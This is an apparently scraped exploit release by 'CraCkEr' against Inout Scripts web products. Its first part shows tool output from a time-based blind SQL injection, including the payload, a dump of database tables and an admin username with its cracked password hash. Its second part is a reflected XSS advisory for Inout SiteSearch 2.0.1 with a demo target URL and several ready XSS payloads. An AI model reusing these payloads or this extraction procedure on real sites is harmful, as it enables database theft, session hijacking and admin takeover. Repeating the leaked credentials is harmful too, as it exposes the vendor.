│<br />│ │<br />┌┌───────────────────────────────────────────────────────────────────────────────────────┐<br />┌┘ ┌┘<br />└───────────────────────────────────────────────────────────────────────────────────────┘┘<br /><br />Greets:<br /><br /> The_PitBull, Raz0r, iNs, Sad, His0k4, Hussin X, Mr. SQL <br /> Phr33k , NK, GoldenX, Wehla, Cap, DarkCatSpace, R0ot, KnG, Centerk, chamanwal<br /> loool, DevS, Dark-Gost, Carlos132sp, ProGenius, bomb, fjear, H3LLB0Y, ix7<br /> <br /> CryptoJob (Twitter) twitter.com/CryptozJob<br /> <br />┌┌───────────────────────────────────────────────────────────────────────────────────────┐<br />┌┘ © CraCkEr 2022 ┌┘<br />└───────────────────────────────────────────────────────────────────────────────────────┘┘<br /><br /><br />POST parameter 'lidaray' is vulnerable.<br /><br />---<br />Parameter: lidaray (POST)<br /> Type: time-based blind<br /> Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)<br /> Payload: lidaray=20MKTTVT24' AND (SELECT 1823 FROM (SELECT(SLEEP(5)))Caim) AND 'bHOb'='bHOb<br />---<br /><br />[INFO] the back-end DBMS is MySQL<br /><br />[INFO] fetching current database<br />current database: 'inout_realestate'<br /><br /><br />fetching tables for database: 'inout_realestate'<br /><br />Database: inout_realestate<br />[45 tables]<br />+--------------------------------+<br />| adcode |<br />| admin_account |<br />| admin_payment_details |<br />| agent_list_request_to_user |<br />| broker_citymap |<br />| broker_rate |<br />| broker_review |<br />| brokerabusereport |<br />| category_property |<br />| chat_details |<br />| chat_messages |<br />| checkout_ipn |<br />| countries |<br />| custom_field |<br />| detail_statistics_list |<br />| email_templates |<br />| enquiry_status |<br />| forgetpassword |<br />| inout_ipns |<br />| invoicegen |<br />| languages |<br />| list_brokermap |<br />| list_images |<br />| list_main |<br />| listopenhouse |<br />| normal_statistics_list |<br />| paymentdetailstat |<br />| ppc_currency |<br />| public_side_media_detail |<br />| public_slide_images |<br />| pupularsiarchlist |<br />| recentsearchlist |<br />| settings |<br />| sold_listing |<br />| soldlistadd |<br />| traveller_bank_deposit_history |<br />| user_broker_licenses |<br />| user_broker_registration |<br />| user_email_verification |<br />| user_list_agent_request |<br />| user_registration |<br />| user_wishlist_mapping |<br />| userabusereport |<br />| userlistactive |<br />| wish_list |<br />+--------------------------------+<br /><br /><br />[INFO] fetching columns for table 'admin_account' in database 'inout_realestate'<br /><br />Database: inout_realestate<br />Table: admin_account<br />[6 columns]<br />+------------+--------------+<br />| Column | Type |<br />+------------+--------------+<br />| admin_type | tinyint(4) |<br />| id | int(11) |<br />| logouttime | int(11) |<br />| password | varchar(255) |<br />| status | tinyint(4) |<br />| username | varchar(200) |<br />+------------+--------------+<br /><br /><br />[INFO] fetching entries of column(s) 'admin_type,id,password,username' for table 'admin_account' in database 'inout_realestate'<br /><br />Database: inout_realestate<br />Table: admin_account<br />[1 entry]<br />+----+----------+------------------------------------------+------------+<br />| id | username | password | admin_type |<br />+----+----------+------------------------------------------+------------+<br />| 1 | admin | 21232f297a57a5a743894a0e4a801fc3 (admin) | 0 |<br />+----+----------+------------------------------------------+------------+<br /><br /><br />[-] Done<br /></code></pre>
<pre><code>┌┌───────────────────────────────────────────────────────────────────────────────────────┐<br />││ C r a C k E r ┌┘<br />┌┘ T H E C R A C K O F E T E R N A L M I G H T ││<br />└───────────────────────────────────────────────────────────────────────────────────────┘┘<br /><br /> ┌──── From The Ashes and Dust Rises An Unimaginable crack.... ────┐<br />┌┌───────────────────────────────────────────────────────────────────────────────────────┐<br />┌┘ [ Exploits ] ┌┘<br />└───────────────────────────────────────────────────────────────────────────────────────┘┘<br />: Author : CraCkEr │ │ :<br />│ Website : inoutscripts.com │ │ │<br />│ Vendor : Inout Scripts │ │ │<br />│ Software : Inout SiteSearch 2.0.1 │ │ Inout SiteSearch is a premium script │<br />│ Vuln Type: Cross Site Scripting Reflected │ │ that allows you to add a site │<br />│ Method : GET │ │ search feature │<br />│ Impact : Manipulate the content of │ │ │<br />│ the site │ │ │<br />│────────────────────────────────────────────┘ └─────────────────────────────────────────│<br />│ B4nks-NET irc.b4nks.tk #unix ┌┘<br />└───────────────────────────────────────────────────────────────────────────────────────┘┘<br />: :<br />│ Release Notes: │<br />│ ═════════════ │<br />│ │<br />│ The attacker can send to victim a link containing a malicious URL in an email or │<br />│ instant message can perform a wide variety of actions, such as stealing the victim's │<br />│ session token or login credentials │<br />│ │<br />┌┌───────────────────────────────────────────────────────────────────────────────────────┐<br />┌┘ ┌┘<br />└───────────────────────────────────────────────────────────────────────────────────────┘┘<br /><br />Greets:<br /><br /> The_PitBull, Raz0r, iNs, Sad, His0k4, Hussin X, Mr. SQL <br /> Phr33k , NK, GoldenX, Wehla, Cap, DarkCatSpace, R0ot, KnG, Centerk, chamanwal<br /> loool, DevS, Dark-Gost, Carlos132sp, ProGenius, bomb, fjear, H3LLB0Y, ix7<br /> <br /> CryptoJob (Twitter) twitter.com/CryptozJob<br /> <br />┌┌───────────────────────────────────────────────────────────────────────────────────────┐<br />┌┘ © CraCkEr 2022 ┌┘<br />└───────────────────────────────────────────────────────────────────────────────────────┘┘<br /><br />GET parameter 'searchkeyword' is vulnerable to XSS<br /><br />http://inout-sitesearch.demo.inoutscripts.net/index.php/search/result?searchkeyword=[XSS]<br /><br /><br />Some XSS Payloads Reflected<br /><br />javascript:/*--></title></style></textarea></script></xmp><svg/onload='+/"/+/onmouseover=1/+/[*/[]/+alert(1)//'><br /><br /><IMG """><SCRIPT>alert("XSS")</SCRIPT>"\><br /><br /></TITLE><SCRIPT>alert("XSS");</SCRIPT><br /><br /><br /><br />[-] Done<br /></code></pre>